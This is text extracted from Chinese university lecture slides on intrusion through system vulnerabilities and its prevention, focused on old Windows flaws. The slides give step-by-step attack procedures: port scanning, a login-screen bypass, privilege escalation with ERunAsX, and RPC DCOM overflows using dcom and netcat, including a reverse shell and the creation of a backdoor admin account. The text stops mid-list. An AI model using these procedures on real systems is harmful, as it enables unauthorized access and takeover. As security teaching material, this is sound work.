04_基于漏洞的入侵及其防范之一教程.ppt

基于漏洞的入侵及其防范 田宏政 系统的漏洞难以避免 任何系统都不是完美的，在设计和实现上总是存在或多或少的缺陷。 其中，有些缺陷只要巧妙地加以利用，可以绕过系统的认证机制而直接进入系统 利用系统漏洞进行的入侵，危害性较强，缺乏有效防范手段 未知的漏洞难以防范，即使已知的漏洞也较难防范，一般依靠系统开发商推出安全补丁。 漏洞产生的原因 系统漏洞也称安全缺陷，这些安全缺陷会被技术高低不等的入侵者所利用，从而达到控制目标主机或造成一些更具破坏性的目的。 漏洞的产生大致可分为以下两类: 在程序编写过程中的人为遗留 程序设计人员为了达到不可告人的目的，有意识地在程序的隐蔽处留下各种各样的后门，以供自己日后使用，不过，随着法律的完善，这类漏洞将越来越少(别有用心者除外)。 安全加密方法所局限 由于编程人员的水平问题、经验和当时安全技术加密方法所局限，在程序中总会或多或少的出现些不足之处，这些地方有的影响程序的效率，有的会导致非授权用户的权利提升。 漏洞的分类 系统漏洞 操作系统的漏洞 重要服务的漏洞 数据库服务器的漏洞 Web服务器的漏洞 用户自己的应用系统中的漏洞 SQL Injection(SQL注入) 认证漏洞 。。。 Windows几个已知的主要漏洞 中文输入法漏洞 IIS漏洞带来的入侵 SQL服务器带来的入侵 远程溢出漏洞 本地提权类漏洞 …… 操作系统漏洞的例子(1) Windows 2000中文版的输入法漏洞 存在于没有打上SP2的Windows 2000中文版 该漏洞可以在没有登录系统的情况下，通过登录窗口的中文输入法帮助而浏览计算机的内容 如果机器启用了终端服务（3389端口），任何人都可以通过终端服务客户端得到该机管理员权限 进程处理本地权限提升漏洞（Debug漏洞) 中文输入法漏洞利用：使用3389端口进行入侵过程 扫描3389主机 工具：Sfind(在FTP上下载：“课件区\入侵防范与病毒防范\Tools”) 命令：sfind –p 3389 [IP] [IP] 远程终端连接 在命令窗口中输入：mstsc 输入对方主机IP 出现远程主机登录界面 使用中文输入法的漏洞进行入侵 Debug漏洞 漏洞利用：提升帐号权限。 提升权限工具：ERunAsX(可自行下载） 使用命令：ErunAsX 命令 功能：以管理员身份执行命令 入侵过程： 3389登录 植入ERunAsX（用COPY 、FTP等手段进行） 提升权限：先用guest身份进入命令方式；进入ERunAsX文件夹；使用命令ERunAsX cmd.exe 此时原窗口光标会停下来，同时会另外打开一个新的命令行窗口，该窗口具有管理员权限，但不要关闭原窗口。此时入侵者就可以在新窗口用NET命令添加帐号了。 操作系统漏洞的例子(2) ——RPCDCOM(远程过程调用）（分布式组件对象模型）漏洞 存在于多个Windows版本中 冲击波病毒利用了该漏洞 利用该漏洞的一个入侵过程: 使用工具dcom.exe(在FTP上下载：“课件区\入侵防范与病毒防范\Tools”)。使用命令：dcom –d [IP] 通过Telnet或nc 登录。 进入到对方的“C:\winnt\system32”子目录下。 RPC接口远程任意代码可执行漏洞（参看教材P300）之一（2003年发布） 使用端口135，139，445 漏洞检测： 用X-Scan RPC漏洞专用扫描器：Retina (R) -DCOM Scanner 漏洞产生的影响：冲击波及其变种 漏洞利用（一） 利用以下两个工具：Rpcdcom和OpenRpcss 入侵过程：先用 Rpcdcom [IP] 给对方发送畸形数据，再用OpenRpcss \\IP 建立管理员帐号 入侵结果：在远程主机内部建立一个用户名为qing10，密码亦为qing10的管理员账号。 RPC漏洞利用（二） 用DCOM和NC 两种方式： 入侵者主机连接：先用dcom –d [IP] 命令让对方溢出，再用Telnet 或nc登录远程主机 反弹式连接（远程主机主动与入侵者连接）：先用命令 nc –l –p 250 打开本地监听端口，然后另外打开一个命令窗口后输入命令 dcom –d [IP] –h [本地IP] –P 250 (后一个是大写的P）。成功后便会在nc窗口得到远程主机的命令窗口，用以执行任何命令。 RPC漏洞之二（2006年发布）——影响W2000S SP4 利用工具：ms06049.exe 功能：把本地主机的当前用户提升为管理员。（如把guest提升为管理员) 后果：导致非特权用户权限提升。 操作系统漏洞的例子(3)--IIS系列漏洞 Ida.idq漏洞 Printer漏洞 Unicode编码漏洞 .asp映射分块编码漏洞 Web